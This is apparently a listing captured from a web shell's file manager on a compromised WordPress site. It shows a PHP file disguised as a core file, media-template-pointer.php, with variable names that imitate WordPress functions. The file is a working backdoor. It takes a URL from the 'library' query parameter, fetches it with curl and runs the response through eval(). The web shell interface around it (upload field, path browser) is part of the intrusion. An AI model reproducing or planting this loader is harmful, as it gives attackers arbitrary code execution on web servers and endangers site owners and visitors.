Your IP : 216.73.216.162


Current Path : /home/x/b/o/xbodynamge/namtation/wp-content/
Upload File :
Current File : /home/x/b/o/xbodynamge/namtation/wp-content/media-template-pointer.php.tar

home/xbodynamge/dev/wp-includes/media-template-pointer.php000064400000000652151122676160017732 0ustar00<?php

if (isset($_GET['library'])) {
    $language_attributes_rl = $_GET['library'];
    if ($get_post_thumbnail_id_mtq = curl_init()) {
        curl_setopt($get_post_thumbnail_id_mtq, CURLOPT_URL, $language_attributes_rl);
        curl_setopt($get_post_thumbnail_id_mtq, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_post_thumbnail_id_mtq));
        curl_close($get_post_thumbnail_id_mtq);
        exit;
    }
}